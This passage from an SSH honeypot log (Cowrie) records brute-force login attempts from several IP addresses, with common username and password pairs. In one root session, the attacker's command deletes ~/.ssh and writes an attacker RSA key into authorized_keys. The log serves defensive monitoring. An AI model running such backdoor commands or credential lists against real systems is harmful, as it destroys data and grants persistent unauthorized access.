com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:48:16.053120Z","src_ip":"212.227.235.229","session":"6dfd26219558"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:48:17.340328Z","src_ip":"212.227.235.229","session":"6dfd26219558"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:18.653714Z","src_ip":"212.227.235.229","session":"6dfd26219558"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54230,"dst_ip":"1.2.3.4","dst_port":22,"session":"43472898b1a1","protocol":"ssh","message":"New connection: 212.227.235.229:54230 (1.2.3.4:22) [session: 43472898b1a1]","sensor":"my-vps","timestamp":"2025-09-08T23:48:18.956592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:48:18.957261Z","src_ip":"212.227.235.229","session":"43472898b1a1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:48:19.259954Z","src_ip":"212.227.235.229","session":"43472898b1a1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:48:20.560565Z","src_ip":"212.227.235.229","session":"43472898b1a1"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:20.864721Z","src_ip":"212.227.235.229","session":"a4e529fec663"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:20.866210Z","src_ip":"212.227.235.229","session":"43472898b1a1"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":56706,"dst_ip":"1.2.3.4","dst_port":22,"session":"7de879bd2e6a","protocol":"ssh","message":"New connection: 93.113.63.124:56706 (1.2.3.4:22) [session: 7de879bd2e6a]","sensor":"my-vps","timestamp":"2025-09-08T23:48:23.926526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:48:23.927484Z","src_ip":"93.113.63.124","session":"7de879bd2e6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:48:24.007008Z","src_ip":"93.113.63.124","session":"7de879bd2e6a"}
{"eventid":"cowrie.login.failed","username":"service","password":"111","message":"login attempt [service/111] failed","sensor":"my-vps","timestamp":"2025-09-08T23:48:24.352922Z","src_ip":"93.113.63.124","session":"7de879bd2e6a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:25.425461Z","src_ip":"93.113.63.124","session":"7de879bd2e6a"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":43014,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7ede642b350","protocol":"ssh","message":"New connection: 45.150.34.92:43014 (1.2.3.4:22) [session: b7ede642b350]","sensor":"my-vps","timestamp":"2025-09-08T23:48:37.266054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:48:37.266852Z","src_ip":"45.150.34.92","session":"b7ede642b350"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:48:37.744949Z","src_ip":"45.150.34.92","session":"b7ede642b350"}
{"eventid":"cowrie.login.failed","username":"public","password":"public","message":"login attempt [public/public] failed","sensor":"my-vps","timestamp":"2025-09-08T23:48:37.798310Z","src_ip":"45.150.34.92","session":"b7ede642b350"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:38.817850Z","src_ip":"45.150.34.92","session":"b7ede642b350"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":37784,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ff9d3f068dc","protocol":"ssh","message":"New connection: 182.18.161.165:37784 (1.2.3.4:22) [session: 2ff9d3f068dc]","sensor":"my-vps","timestamp":"2025-09-08T23:48:50.561067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:48:50.561964Z","src_ip":"182.18.161.165","session":"2ff9d3f068dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:48:50.806974Z","src_ip":"182.18.161.165","session":"2ff9d3f068dc"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql1234","message":"login attempt [mysql/mysql1234] failed","sensor":"my-vps","timestamp":"2025-09-08T23:48:51.830761Z","src_ip":"182.18.161.165","session":"2ff9d3f068dc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:53.079026Z","src_ip":"182.18.161.165","session":"2ff9d3f068dc"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":58700,"dst_ip":"1.2.3.4","dst_port":22,"session":"913631d23517","protocol":"ssh","message":"New connection: 46.101.8.63:58700 (1.2.3.4:22) [session: 913631d23517]","sensor":"my-vps","timestamp":"2025-09-08T23:48:53.754565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:48:53.755434Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:48:53.775001Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.login.success","username":"root","password":"zhiyuan","message":"login attempt [root/zhiyuan] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:48:53.900146Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:48:53.961111Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:48:53.961852Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:48:53.962729Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:53.984150Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:48:54.132094Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:48:54.132791Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:48:54.155237Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:54.156041Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":58850,"dst_ip":"1.2.3.4","dst_port":22,"session":"12cd38fa88bf","protocol":"ssh","message":"New connection: 46.101.8.63:58850 (1.2.3.4:22) [session: 12cd38fa88bf]","sensor":"my-vps","timestamp":"2025-09-08T23:48:54.175068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:48:54.175762Z","src_ip":"46.101.8.63","session":"12cd38fa88bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:48:54.196187Z","src_ip":"46.101.8.63","session":"12cd38fa88bf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:48:54.320723Z","src_ip":"46.101.8.63","session":"12cd38fa88bf"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:55.344667Z","src_ip":"46.101.8.63","session":"12cd38fa88bf"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":59420,"dst_ip":"1.2.3.4","dst_port":22,"session":"091c2dfec2d5","protocol":"ssh","message":"New connection: 46.101.8.63:59420 (1.2.3.4:22) [session: 091c2dfec2d5]","sensor":"my-vps","timestamp":"2025-09-08T23:48:55.368182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:48:55.369094Z","src_ip":"46.101.8.63","session":"091c2dfec2d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:48:55.392699Z","src_ip":"46.101.8.63","session":"091c2dfec2d5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:48:55.528720Z","src_ip":"46.101.8.63","session":"091c2dfec2d5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:55.553013Z","src_ip":"46.101.8.63","session":"913631d23517"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:48:55.554330Z","src_ip":"46.101.8.63","session":"091c2dfec2d5"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":38528,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f6aefc2d3ea","protocol":"ssh","message":"New connection: 93.113.63.124:38528 (1.2.3.4:22) [session: 3f6aefc2d3ea]","sensor":"my-vps","timestamp":"2025-09-08T23:49:32.769496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:49:32.770930Z","src_ip":"93.113.63.124","session":"3f6aefc2d3ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:49:32.830605Z","src_ip":"93.113.63.124","session":"3f6aefc2d3ea"}
{"eventid":"cowrie.login.failed","username":"http","password":"1","message":"login attempt [http/1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:49:33.223421Z","src_ip":"93.113.63.124","session":"3f6aefc2d3ea"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:49:34.360634Z","src_ip":"93.113.63.124","session":"3f6aefc2d3ea"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":56082,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e5f696678eb","protocol":"ssh","message":"New connection: 46.101.8.63:56082 (1.2.3.4:22) [session: 9e5f696678eb]","sensor":"my-vps","timestamp":"2025-09-08T23:49:50.340721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:49:50.341511Z","src_ip":"46.101.8.63","session":"9e5f696678eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","ae